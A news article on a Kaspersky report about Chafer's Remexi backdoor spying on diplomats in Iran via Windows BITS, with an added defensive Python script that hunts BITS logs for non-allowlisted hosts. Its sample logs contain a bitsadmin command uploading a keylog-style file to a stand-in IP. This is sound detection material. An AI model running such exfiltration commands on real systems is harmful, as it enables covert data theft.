Security researchers have uncovered a new cyber-espionage campaign against foreign diplomats in Iran, using malware linked to a well-known APT group.
Kaspersky Lab researcher Denis Legezo claimed the campaign was indicative of hackers in emerging regions using “homebrew” malware combined with publicly available tools.
In this case they use an improved version of the Remexi backdoor, first reported in 2015, which lets them harvest keystrokes, take screenshots, exfiltrate credentials, logins and browser history, and execute remote commands.
Data is exfiltrated through the legitimate Windows Background Intelligent Transfer Service (BITS), which saves the group development effort and complicates attribution, Kaspersky Lab said. Because BITS transfers are performed by a signed Microsoft component, they tend to pass host and proxy controls that trust Windows binaries, so defenders need to look at the BITS jobs themselves, and the remote URLs they talk to, rather than rely on blocking unknown executables.
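The check a defender would want here is a hunt over BITS telemetry for jobs that talk to hosts outside the set the estate expects. The following is an added example, not code from the article or from Kaspersky's report: it runs over constructed log lines that imitate Microsoft-Windows-Bits-Client/Operational events 59 and 60 (which carry the job name and remote URL) and a process-creation event carrying a bitsadmin.exe command line. The allowlist, the event-text rendering and the sample lines are assumptions for illustration. Real events 59/60 do not state the transfer direction, so the example takes direction from the bitsadmin command line where one is logged.

```python
"""Hunt for BITS transfer jobs that talk to hosts outside an allowlist.

Added example; not the article's or Kaspersky's code. The event text
rendering, allowlist and sample lines below are assumptions.
"""
import re
from urllib.parse import urlparse

# Hosts this (hypothetical) estate expects BITS to contact.
ALLOWED_HOSTS = {
    "download.windowsupdate.com",
    "update.microsoft.com",
    "wsus.corp.example",
}

# Bits-Client/Operational events 59 (started) and 60 (stopped): job name + remote URL.
EVT_RE = re.compile(
    r"EventID=(?P<id>59|60) BITS (?:started|stopped transferring) the (?P<job>\S+) "
    r"transfer job that is associated with the (?P<url>\S+) URL"
)
# bitsadmin /transfer <job> [/download|/upload] <remoteURL> <localFile>
BITSADMIN_RE = re.compile(
    r"bitsadmin(?:\.exe)?\s+/transfer\s+(?P<job>\S+)\s+"
    r"(?:(?P<type>/upload|/download)\s+)?(?P<url>https?://\S+)",
    re.IGNORECASE,
)
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample telemetry, not real logs.
SAMPLE_LOGS = [
    "2019-01-30T10:01:02 EventID=59 BITS started the WUjob transfer job that is "
    "associated with the http://download.windowsupdate.com/c/update.cab URL.",
    "2019-01-30T10:05:17 EventID=59 BITS started the sysupd transfer job that is "
    "associated with the http://203.0.113.10/upload.php URL.",
    "2019-01-30T10:05:18 EventID=4688 New Process Name: C:\\Windows\\System32\\bitsadmin.exe "
    "Command Line: bitsadmin.exe /transfer sysupd /upload http://203.0.113.10/upload.php "
    "C:\\Users\\Public\\kl.dat",
    "2019-01-30T10:06:00 EventID=60 BITS stopped transferring the sysupd transfer job that is "
    "associated with the http://203.0.113.10/upload.php URL. The status code is 0x0.",
    "2019-01-30T10:07:11 EventID=4624 An account was successfully logged on.",
]


def classify(line):
    """Describe one BITS job mention in a log line, or return None if the line is unrelated."""
    m = EVT_RE.search(line) or BITSADMIN_RE.search(line)
    if not m:
        return None
    url = m.group("url")
    host = (urlparse(url).hostname or "").lower()
    # Direction is only known when the bitsadmin command line was logged.
    upload = (m.groupdict().get("type") or "").lower() == "/upload"
    return {
        "job": m.group("job"),
        "url": url,
        "host": host,
        "upload": upload,
        "suspicious": host not in ALLOWED_HOSTS,
    }


def hunt(lines):
    """Fold per-line hits into per-job findings; return only jobs needing analyst review."""
    jobs = {}
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        j = jobs.setdefault(hit["job"], {"hosts": set(), "upload": False})
        j["hosts"].add(hit["host"])
        j["upload"] = j["upload"] or hit["upload"]

    findings = []
    for name, j in jobs.items():
        reasons = []
        bad = sorted(h for h in j["hosts"] if h not in ALLOWED_HOSTS)
        if bad:
            reasons.append("remote host not allowlisted: " + ", ".join(bad))
        if any(IP_RE.match(h) for h in bad):
            reasons.append("remote host is a bare IP address")
        if j["upload"]:
            reasons.append("job direction is /upload (data leaves the host)")
        if reasons:
            findings.append({"job": name, "hosts": sorted(j["hosts"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f["job"], f["hosts"], *f["reasons"], sep="\n  ")
```

The point of folding by job name is that the operational log and the process-creation log each give only half the picture: the BITS events tell you a job ran and where it went, the command line tells you which way the data moved. An update job to an allowlisted host produces no finding; a job to a bare IP with an /upload flag produces three reasons on one line.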
“When we talk about likely state-sponsored cyber-espionage campaigns, people often imagine advanced operations with complex tools developed by experts. However, the people behind this spyware campaign look more like system administrators than sophisticated threat actors: they know how to code, but their campaign relies more on the creative use of tools that exist already, than on new, advanced features or elaborate architecture of the code,” Legezo argued.
“However, even relatively simple tools can cause significant damage, so we urge organizations to protect their valuable information and systems against all levels of threats, and to use threat intelligence to understand how the landscape is evolving.”
Kaspersky Lab has not said how the malware is delivered. The campaign has been linked to a Farsi-speaking APT group known as Chafer, whose activity dates back to at least 2014.
The group is known to focus on domestic targets, although going after foreign embassies within the Islamic Republic represents a new approach.
Legezo urged organizations to arm themselves with corporate-grade security, including the capability to detect targeted attacks, enhanced security awareness training for employees, and up-to-date threat intelligence.